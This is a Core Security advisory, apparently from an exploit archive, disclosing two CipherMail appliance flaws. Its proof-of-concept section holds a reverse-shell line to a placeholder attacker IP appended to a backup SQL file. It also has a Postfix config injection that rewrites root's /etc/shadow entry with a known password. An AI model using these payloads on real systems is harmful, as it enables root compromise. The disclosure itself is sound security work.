CipherMail Community Virtual Appliance 4.6.2 Code Execution

CipherMail Community Virtual Appliance version 4.6.2 suffers from remote command execution and file injection vulnerabilities.

MD5 | 1e03b7ce73404f389184d11c6489d8e8

CipherMail Multiple Vulnerabilities

1. Advisory Information

Title: CipherMail Email Encryption Gateway Community Virtual Appliance Multiple Vulnerabilities
Advisory ID: CORE-2020-0008
Advisory URL:
Date published: 2020-05-28
Date of last update: 2020-05-28
Vendors contacted: CipherMail
Release mode: Coordinated release

2. Vulnerability Information

Class: Improper Control of Generation of Code (Code Injection) [CWE-94], Improper Input Validation [CWE-20], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2020-12713 , CVE-2020-12714

3. Vulnerability Description

CipherMail is a global cybersecurity company based in the Netherlands focused on email security products. CipherMail creates both commercial solutions and sponsors open source tools. CipherMail Email Encryption Gateway can be deployed with any email system and uses multiple encryption standards to provide message integrity and protection against interception. Both an enterprise edition and an open source community version are available. [1]

Two vulnerabilities were found in version 4.6.2 of the Community Virtual Appliance, which would allow a remote attacker with access to the management console and administrator rights to execute arbitrary privilege commands on the operating system.

4. Vulnerable Packages

CipherMail Community Virtual Appliance version 4.6.2.

Other products and versions might be affected, but have not yet been tested.

5. Vendor Information, Solutions, and Workarounds

The following versions have been published to correct the vulnerabilities: CipherMail Gateway 4.8 and Webmail Messenger 3.2

Patch instructions for older releases are also available.

6. Credits

This vulnerability was discovered and researched by Iván Koiffman, Fernando Catoira and Fernando Diaz from Core Security Consulting Services.

The publication of this advisory was coordinated by Pablo A. Zurro from the CoreLabs Advisories Team.

7. Technical Description / Proof of Concept Code

CipherMail Community Virtual Appliance is an open souce virtual appliance version of the Email Encryption Gateway. It is designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to manage domains, users, DLP policies, and other services.

Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to obtain command execution on the system.
7.1 Remote Command Execution Via Backup Restore

[CVE-2020-12713] Ciphermail Web Management console provides a system backup functionality only accessible by the administrator's role which allows them to backup or restore the system settings. This capability can be affected by a remote code execution vulnerability.

The following proof of concept demonstrates the vulnerability:

1. First, the create backup functionality, which is present in the path /admin/backup/create, must be invoked in order to download the system settings. This feature downloads a compressed file containing SQL statements and some other files.

2. The obtained file should then be decompressed. The word system can then be added, followed by the command that is going to be executed at the end of the SQL statements file. Below is a snippet using system to obtain a reverse shell:

-- MySQL dump 10.16 Distrib 10.2.21-MariaDB, for Linux (x86_64)
-- Host: localhost Database: djigzo
-- ------------------------------------------------------
-- Server version 10.2.21-MariaDB
-- Dumping data for table `cm_users`

/*!40000 ALTER TABLE `cm_users` DISABLE KEYS */;
INSERT INTO `cm_users` VALUES (1,'[email protected]',5);
/*!40000 ALTER TABLE `cm_users` ENABLE KEYS */;


system bash -i >& /dev/tcp/[Attacker IP]/[Attacker Port] 0>&1
-- Dump completed on 2019-03-28 18:48:05

3. It is then necessary to recompress the recently modified file along with the other ones within a new tar.gz file and execute restore backup functionality from the administration console.

4. Finally, the command can be executed in the backend server and a reverse shell should be obtained. The reverse shell is executed under the context of the user running the database server.
7.2 Configuration File Injection Leading to Code Execution as Root

[CVE-2020-12714] The CipherMail Web Management console provides a functionality accessible by users with an administrator's role to manage Postfix. It is possible to edit Postfix’s configuration file within the CipherMail Web Management console and add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix configuration file.

The following proof of concept demonstrates the vulnerability:

The next four lines should be added in order to replace the root password in the system:

[ Postfix configuration file]
always_bcc = [email protected]
multi_instance_wrapper=sed -i /root:/c\root:KoVhDRK7oesZg:17926:0:99999:7::: /etc/shadow

After the new file is saved, the Postfix service is automatically restarted and the file pointed by multi_instance_wrapper is executed.

In this proof of concept, we were able to execute a sed command to set the password of the root user to pentest. Note that we used DES and not bcrypt because the $ symbol is not allowed by syntax (syntax is limited and some symbols are not allowed, including "<", ">", "|", among others). To generate a password in DES using bash, we first executed the following command:

$ mkpasswd -m des
Password: pentest

As shown above, we used the obtained string KoVhDRK7oesZg as part of the sed command to set the password of the root user to pentest.

It is now possible to establish a SSH connection (the SSH server is enabled by default) and log in as the root user with the new password set.

8. Report Timeline

2020-04-07 - Vulnerability discovered by CoreLabs.

2020-04-30 - First contact made with the vendor.

2020-04-30 - Answer received and advisory draft provided to CipherMail.

2020-04-30 - Vulnerabilities recognized by the vendor.

2020-05-21 - CVEs requested and received from Mitre.

2020-05-28 - Fix and release changes published by vendor.

2020-05-28 - Advisory published.

9. References



10. About CoreLabs

CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at
11. About Core Security, A HelpSystems Company

Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License:

Related Posts